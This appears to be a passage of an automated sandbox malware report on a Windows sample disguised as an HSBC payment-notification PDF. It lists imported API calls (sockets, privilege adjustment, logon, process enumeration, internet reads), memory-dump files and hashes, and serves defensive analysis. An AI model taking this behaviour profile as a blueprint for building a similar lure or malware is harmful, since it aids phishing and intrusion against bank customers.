• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
• Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
• Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
• Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
• Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00401A4E
                                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00401A61
                                                                                                                                                      • Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ColorProc$LongWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3744519093-0
                                                                                                                                                    • Opcode ID: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                    • Instruction ID: d041ec2a837aeb515327988813bafb0785b4d0a615f46c6b1421ede386c2745f
                                                                                                                                                    • Opcode Fuzzy Hash: 8db6b4c7db5f97784a80f15b687025ec058e6c3025e7102d3aafc5b58ad8fc88
                                                                                                                                                    • Instruction Fuzzy Hash: A4A124B1202544BAE629BA694C88F7F255CDF45345F14053FF602F62F2CA3C9D429ABE
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000), ref: 00477DB6
                                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 0047679E
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 004767C7
                                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00476800
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0047680D
                                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 00476821
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 99427753-0
                                                                                                                                                    • Opcode ID: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                                                                                                                    • Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
                                                                                                                                                    • Opcode Fuzzy Hash: 77a8c2a142281090e394b0e0d14c417a392868478e52ac264b4faa38142e6d55
                                                                                                                                                    • Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                    • Opcode ID: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                    • Instruction ID: 2bf7cd1b22f0a435aba1bf6783624a0e9851140f374647b9b1574053626a0f4e
                                                                                                                                                    • Opcode Fuzzy Hash: 7ffe818374d74fed162708100ced44c3bb0424a7746e5ca8e896d501ecac1497
                                                                                                                                                    • Instruction Fuzzy Hash: BB11B232700911ABEB217F269C44A6F7B99EF447A1B40483EFC45E3242DB789C0287AD
                                                                                                                                                    APIs
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                                    • Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                    • Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
                                                                                                                                                    • Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
                                                                                                                                                    • Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0046C432
                                                                                                                                                    • CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0046C6B7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                    • String ID: .lnk
                                                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                                                    • Opcode ID: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                                                                                    • Instruction ID: adb56a4b7a52abdaef05598002f92e73435f728c8d9d90c66f29e414dbdf6fe1
                                                                                                                                                    • Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
                                                                                                                                                    • Instruction Fuzzy Hash: 5AA14AB1104205AFD700EF55C881EAFB7E8EF85308F00492EF595972A2EB75EE09CB56
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00404AD0), ref: 00404B45
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404B57
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
                                                                                                                                                      • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2576544623-0
                                                                                                                                                    APIs
                                                                                                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen
                                                                                                                                                    • String ID: ($|
                                                                                                                                                    • API String ID: 1659193697-1631851259
                                                                                                                                                    APIs
                                                                                                                                                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
                                                                                                                                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 599397726-0
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0046B343
                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1682464887-0
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                                                                                      • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00458865
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1922334811-0
                                                                                                                                                    APIs
                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
                                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 0045879B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3429775523-0
APIs
• __time64.LIBCMT ref: 0046889B
  • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
  • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: 0eL
• API String ID: 2893107130-3167399643
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
• FindClose.KERNEL32(00000000), ref: 0046C72B
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
• CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                                                                                    • Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
                                                                                                                                                    • Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
                                                                                                                                                    • Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: mouse_event
• String ID:
• API String ID: 2434400541-0
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• SetTextColor.GDI32(?,00000000), ref: 0048A630
• GetSysColorBrush.USER32(0000000F), ref: 0048A661
• GetSysColor.USER32(0000000F), ref: 0048A66D
• SetBkColor.GDI32(?,000000FF), ref: 0048A687
• SelectObject.GDI32(?,00000000), ref: 0048A696
• InflateRect.USER32(?,000000FF,000000FF), ref: 0048A6C1
• GetSysColor.USER32(00000010), ref: 0048A6C9
• CreateSolidBrush.GDI32(00000000), ref: 0048A6D0
• FrameRect.USER32(?,?,00000000), ref: 0048A6DF
• DeleteObject.GDI32(00000000), ref: 0048A6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 0048A731
• FillRect.USER32(?,?,00000000), ref: 0048A763
• GetWindowLongW.USER32(?,000000F0), ref: 0048A78E
  • Part of subcall function 0048A8CA: GetSysColor.USER32(00000012), ref: 0048A903
  • Part of subcall function 0048A8CA: SetTextColor.GDI32(?,?), ref: 0048A907
  • Part of subcall function 0048A8CA: GetSysColorBrush.USER32(0000000F), ref: 0048A91D
  • Part of subcall function 0048A8CA: GetSysColor.USER32(0000000F), ref: 0048A928
  • Part of subcall function 0048A8CA: GetSysColor.USER32(00000011), ref: 0048A945
  • Part of subcall function 0048A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
  • Part of subcall function 0048A8CA: SelectObject.GDI32(?,00000000), ref: 0048A964
  • Part of subcall function 0048A8CA: SetBkColor.GDI32(?,00000000), ref: 0048A96D
  • Part of subcall function 0048A8CA: SelectObject.GDI32(?,?), ref: 0048A97A
  • Part of subcall function 0048A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
  • Part of subcall function 0048A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
  • Part of subcall function 0048A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
  • Part of subcall function 0048A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3521893082-0
                                                                                                                                                    • Opcode ID: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                                                                                                                                                    • Instruction ID: fb34620bd59db4fe0d00bba54468f49f6ea6f7247eb536f08ce7ecc3d6e9d283
                                                                                                                                                    • Opcode Fuzzy Hash: d0b98d0bd2d439f0e376530d70ac2fa86c41f3a1b8d0dc48bc9816d6a88522a1
                                                                                                                                                    • Instruction Fuzzy Hash: 5E917D72408301BFD710AF64DC08A5F7BA9FB89321F100F2EF962961A1D774D949CB5A
                                                                                                                                                    APIs
                                                                                                                                                    • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                                                                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                                                                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C43B
                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C474
                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043C89D
